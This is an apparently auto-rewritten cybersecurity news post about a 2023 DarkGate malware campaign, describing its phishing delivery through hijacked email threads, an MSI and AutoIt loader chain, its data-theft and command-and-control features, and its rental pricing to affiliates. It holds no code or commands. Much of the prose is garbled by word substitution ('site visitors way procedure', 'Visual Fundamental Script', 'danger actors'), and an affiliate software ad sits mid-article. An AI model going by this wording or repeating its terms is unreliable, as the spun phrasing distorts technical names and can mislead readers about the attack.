• Menu
  • Skip to main content
  • Skip to primary sidebar

The Cyber Security News

Latest Cyber Security News

Header Right

  • Latest News
  • Vulnerabilities
  • Cloud Services
darkgate malware activity spikes as developer rents out malware to

DarkGate Malware Activity Spikes as Developer Rents Out Malware to Affiliates

You are here: Home / General Cyber Security News / DarkGate Malware Activity Spikes as Developer Rents Out Malware to Affiliates
August 29, 2023

A new malspam marketing campaign has been noticed deploying an off-the-shelf malware termed DarkGate.

“The present-day spike in DarkGate malware action is plausible given the fact that the developer of the malware has not long ago started out to rent out the malware to a restricted range of affiliate marketers,” Telekom Security stated in a report revealed last week.

The most current conclusions develop on modern conclusions from security researcher Igal Lytzki, who thorough a “superior quantity marketing campaign” that leverages hijacked email threads to trick recipients into downloading the malware.

✔ Approved From Our Partners
AOMEI Backupper Lifetime

Protect and backup your data using AOMEI Backupper. AOMEI Backupper takes secure and encrypted backups from your Windows, hard drives or partitions. With AOMEI Backupper you will never be worried about loosing your data anymore.

Get AOMEI Backupper with 72% discount from an authorized distrinutor of AOMEI: SerialCart® (Limited Offer).

➤ Activate Your Coupon Code


Cybersecurity

The attack commences with a phishing URL that, when clicked, passes via a site visitors way procedure (TDS) to just take the sufferer to an MSI payload issue to specific conditions. This includes the presence of a refresh header in the HTTP response.

Opening the MSI file triggers a multi-stage process that incorporates an AutoIt script to execute shellcode that functions as a conduit to decrypt and start DarkGate by means of a crypter (or loader).

Exclusively, the loader is designed to parse the AutoIt script and extract the encrypted malware sample.

DarkGate Malware

An alternate variation of the attacks have been observed working with a Visual Fundamental Script in put of an MSI file, which, in flip, employs cURL to retrieve the AutoIt executable and script file. The actual process by which the VB Script is shipped is now unidentified.

DarkGate, bought predominantly on underground community forums by an actor named RastaFarEye, comes with capabilities to evade detection by security computer software, established up persistence working with Windows Registry alterations, escalate privileges, and steal details from web browsers and other software package this sort of as Discord and FileZilla.

It also establishes make contact with with a command-and-manage (C2) server for enumerating files, facts exfiltration, launching cryptocurrency miners, and remotely capturing screenshots as properly as functioning other instructions.

Cybersecurity

The malware is presented as a membership that starts off from $1,000 for each working day to $15,000 for each thirty day period to $100,000 a 12 months, with the author advertising it as the “supreme instrument for pentesters/redteamers” and that it has “characteristics that you is not going to locate anyplace.” Apparently, earlier versions of DarkGate also arrived equipped with a ransomware module.

Phishing attacks are a principal shipping pathway for stealers, trojans, and malware loaders these kinds of as KrakenKeylogger, QakBot, Raccoon Stealer, SmokeLoader, and some others, with danger actors continuously introducing new functions and enhancements to broaden their functionalities.

According to a new report published by HP Wolf Security, email remained the leading vector for delivering malware to endpoints, accounting for 79% of threats recognized in Q2 2023.

Discovered this report interesting? Abide by us on Twitter  and LinkedIn to go through extra special written content we submit.


Some components of this posting are sourced from:
thehackernews.com

Previous Post: «survey provides takeaways for security pros to operationalize their remediation Survey Provides Takeaways for Security Pros to Operationalize their Remediation Life Cycle
Next Post: Chinese Hacking Group Exploits Barracuda Zero-Day to Target Government, Military, and Telecom chinese hacking group exploits barracuda zero day to target government, military,»

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Report This Article

Recent Posts

  • BREAKING: 7,000-Device Proxy Botnet Using IoT, EoL Systems Dismantled in U.S. – Dutch Operation
  • OtterCookie v4 Adds VM Detection and Chrome, MetaMask Credential Theft Capabilities
  • Initial Access Brokers Target Brazil Execs via NF-e Spam and Legit RMM Trials
  • Deploying AI Agents? Learn to Secure Them Before Hackers Strike Your Business
  • Malicious npm Packages Infect 3,200+ Cursor Users With Backdoor, Steal Credentials
  • Beyond Vulnerability Management – Can You CVE What I CVE?
  • Google Rolls Out On-Device AI Protections to Detect Scams in Chrome and Android
  • Chinese Hackers Exploit SAP RCE Flaw CVE-2025-31324, Deploy Golang-Based SuperShell
  • 38,000+ FreeDrain Subdomains Found Exploiting SEO to Steal Crypto Wallet Seed Phrases
  • SonicWall Patches 3 Flaws in SMA 100 Devices Allowing Attackers to Run Code as Root

Copyright © TheCyberSecurity.News, All Rights Reserved.